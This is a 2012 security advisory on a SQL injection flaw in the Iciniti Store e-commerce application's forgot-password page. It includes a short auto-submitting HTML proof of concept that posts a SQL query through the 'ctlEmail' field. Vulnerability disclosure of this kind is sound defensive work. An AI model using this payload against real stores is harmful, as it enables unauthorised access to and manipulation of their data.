Sense of Security – Security Advisory – SOS-12-003
| Release Date. | 06-Mar-2012 |
| Last Update. | – |
| Vendor Notification Date. | 28-Jul-2011 |
| Product. | Iciniti Store |
| Platform. | Windows |
| Affected versions. | 4.3.3683.31484 verified, and possibly others |
| Severity Rating. | High |
| Impact. | Manipulation of data |
| Attack Vector. | Remote without authentication |
| Solution Status. | Update is available by contacting Iciniti |
| CVE reference. | CVE- Not yet assigned |
Details.
Iciniti Store is a web application providing e-commerce and payment solutions. The application suffers from a SQL injection vulnerability in logon_forgot_password.aspx. It fails to validate data supplied in the ‘ctlEmail’ variable before being used in an SQL query.
Proof of Concept.
<html>
<head></head>
<body onLoad=javascript:document.form.submit()>
<form action=” http://x.x.x.x/logon_forgot_password.aspx” name=”form”
method=”POST”>
<input type=”text” name=”ctlEmail” value=”SELECT @@VERSION”>
<input type=”text” name=”btnSubmit” value=”Submit”>
</form>
</body>
</html>
Solution.
Update is available by contacting Iciniti.
Discovered by.
Sense of Security Labs.